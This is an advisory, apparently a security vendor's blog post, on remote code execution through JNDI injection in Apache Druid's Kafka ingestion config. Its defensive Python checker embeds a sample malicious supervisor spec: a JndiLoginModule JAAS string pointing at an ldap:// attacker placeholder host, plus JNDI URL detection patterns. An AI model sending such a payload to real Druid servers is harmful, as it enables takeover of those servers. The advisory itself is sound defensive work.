Kafka Configuration Remote Code Execution Vulnerability in Apache Druid (MPS-2023-6623)

Vulnerability description

Apache Druid is a high-performance real-time analytics database. One of its built-in ingestion methods streams data from Apache Kafka, and the Kafka consumer properties for that ingestion are supplied by the user in the supervisor (ingestion) spec.

CVE-2023-25194 is a JNDI injection vulnerability in the Apache Kafka Connect module: a client that controls the `sasl.jaas.config` connection property can select `com.sun.security.auth.module.JndiLoginModule` and point its `user.provider.url` at an attacker-controlled LDAP or RMI server, after which the Kafka client performs the JNDI lookup and loads whatever the server returns. Security researchers recently found that Apache Druid's Kafka ingestion path meets the same exploitation conditions, because the consumer properties in a submitted supervisor spec are passed to the Kafka client without being filtered. An attacker who can submit an ingestion task (through the Druid web console or the supervisor API) can therefore modify the Kafka connection configuration, trigger the JNDI lookup, and execute arbitrary code on the Druid server.

Exposure is limited where Apache Druid is reachable only from an internal network and its authentication mechanism is enabled, since submitting an ingestion spec then requires valid credentials; Druid does not require authentication by default.

Vulnerability name: Kafka Configuration Remote Code Execution Vulnerability in Apache Druid
Vulnerability type: Improper input validation
Discovery time: 2023/4/19
Vulnerability breadth: General
MPS number: MPS-2023-6623
CVE number: - (none assigned to the Druid issue; the underlying Kafka issue is CVE-2023-25194)
CNVD number: -

Sphere of influence

org.apache.druid:druid-core@(-∞, 25.0.0] (all versions up to and including 25.0.0)

Repair plan

Do not expose Apache Druid to the Internet, and enable Druid's authentication and authorization mechanism (for example the druid-basic-security extension) so that ingestion specs can only be submitted by authenticated, authorized users. Where Druid must consume from a SASL-secured Kafka cluster, treat the `consumerProperties` of every submitted supervisor spec as untrusted input: reject any `sasl.jaas.config` that references `JndiLoginModule` or carries a remote `ldap://`, `rmi://` or similar JNDI URL, and allow only the login modules your Kafka deployment actually uses.
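The following is an added example, not code from Apache Druid or from Murphy Security, that shows both the injection shape described above and the input check recommended here. It walks the `ioConfig.consumerProperties` map of a Druid Kafka supervisor spec and reports any property that would make the Kafka client perform a JNDI lookup or load an arbitrary class. The two sample specs are constructed for this example (the attacker host `attacker.example` is a placeholder), and the allowlist policy for class-loading properties is an assumed hardening choice, not a Druid rule.

```python
"""Flag Kafka consumer properties that could trigger a JNDI lookup.

Added example; not Druid's own validation code. The field names
``spec.ioConfig.consumerProperties`` are Druid's; the sample specs below
are constructed for this example.
"""
import json
import re

# JAAS login module that performs a JNDI lookup of the caller-supplied
# user.provider.url; this is the mechanism behind CVE-2023-25194.
JNDI_LOGIN_MODULE = "com.sun.security.auth.module.JndiLoginModule"

# URL schemes a JNDI lookup can resolve to a remote object or class.
JNDI_SCHEME_RE = re.compile(r"\b(ldap|ldaps|rmi|iiop|dns)://", re.IGNORECASE)

# Consumer properties that name a class the Kafka client will load and
# instantiate. Rejecting them outright is an assumed policy for this
# example, not a Druid default.
CLASS_LOADING_KEYS = (
    "sasl.login.callback.handler.class",
    "sasl.client.callback.handler.class",
    "sasl.login.class",
)


def find_jndi_risks(consumer_properties: dict) -> list:
    """Return (property, reason) findings; an empty list means clean."""
    findings = []
    for key, value in consumer_properties.items():
        if not isinstance(value, str):
            continue
        lower_key = key.lower()
        # sasl.jaas.config may also appear with a listener/mechanism prefix
        # (e.g. listener.name.x.plain.sasl.jaas.config), so match the suffix.
        if lower_key.endswith("sasl.jaas.config"):
            if JNDI_LOGIN_MODULE in value:
                findings.append((key, "JndiLoginModule in JAAS config"))
            if JNDI_SCHEME_RE.search(value):
                findings.append((key, "remote JNDI URL in JAAS config"))
        elif lower_key in CLASS_LOADING_KEYS:
            findings.append((key, "custom class loading not allowed"))
        elif JNDI_SCHEME_RE.search(value):
            findings.append((key, "remote JNDI URL"))
    return findings


def check_supervisor_spec(spec_json: str) -> list:
    """Parse a Kafka supervisor spec and check its consumer properties."""
    spec = json.loads(spec_json)
    # Druid nests ioConfig under "spec"; tolerate a bare inner spec too.
    inner = spec.get("spec", spec)
    props = inner.get("ioConfig", {}).get("consumerProperties", {})
    return find_jndi_risks(props)


# Constructed sample: a spec carrying the CVE-2023-25194 payload shape.
MALICIOUS_SPEC = json.dumps({
    "type": "kafka",
    "spec": {"ioConfig": {
        "topic": "events",
        "consumerProperties": {
            "bootstrap.servers": "kafka.internal:9092",
            "security.protocol": "SASL_PLAINTEXT",
            "sasl.mechanism": "PLAIN",
            "sasl.jaas.config": (
                'com.sun.security.auth.module.JndiLoginModule required '
                'user.provider.url="ldap://attacker.example:1389/x" '
                'useFirstPass="true";'
            ),
        },
    }},
})

# Constructed sample: a legitimate SASL/PLAIN configuration.
SAFE_SPEC = json.dumps({
    "type": "kafka",
    "spec": {"ioConfig": {
        "topic": "events",
        "consumerProperties": {
            "bootstrap.servers": "kafka.internal:9092",
            "security.protocol": "SASL_PLAINTEXT",
            "sasl.mechanism": "PLAIN",
            "sasl.jaas.config": (
                'org.apache.kafka.common.security.plain.PlainLoginModule '
                'required username="druid" password="secret";'
            ),
        },
    }},
})

if __name__ == "__main__":
    for name, spec in (("malicious", MALICIOUS_SPEC), ("safe", SAFE_SPEC)):
        print(name, check_supervisor_spec(spec))
```

The check deliberately matches on the `sasl.jaas.config` suffix rather than the exact key, because Kafka also accepts the property with listener and mechanism prefixes, and it treats any remote JNDI URL anywhere in the consumer properties as a finding rather than only inside the JAAS string. Run it as a gate in front of the supervisor API (or as an audit over stored supervisor specs) and refuse any spec for which the returned list is non-empty.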

Reference links

https://www.oscs1024.com/hd/MPS-2023-6623

https://mp.weixin.qq.com/s/O2smYIPIRC_fjGdAetWcMQ

https://hackerone.com/reports/1529790

About Murphy Security

Murphy Security is a technology company providing professional software supply chain security management. Its core team comes from Baidu, Huawei, Wuyun and other companies. The company offers a complete software supply chain security management platform with full-lifecycle, SBOM-centred security management; platform capabilities include software composition analysis, source security management, container image scanning, vulnerability intelligence early warning, and commercial software supply chain access assessment, giving customers end-to-end control from supply chain asset identification and management, through risk detection and security control, to one-click remediation.
Open source project: https://github.com/murphysecurity/murphysec/?sf=qbyj

The product integrates with the tools already in the development process at very low cost, including seamless integration with dozens of tools such as IDEs, GitLab, Bitbucket, Jenkins, Harbor and Nexus.
Free code security detection tool: https://www.murphysec.com/?sf=qbyj
Free intelligence subscription: https://www.oscs1024.com/cm/?sf=qbyj


Source: blog.csdn.net/murphysec/article/details/130423272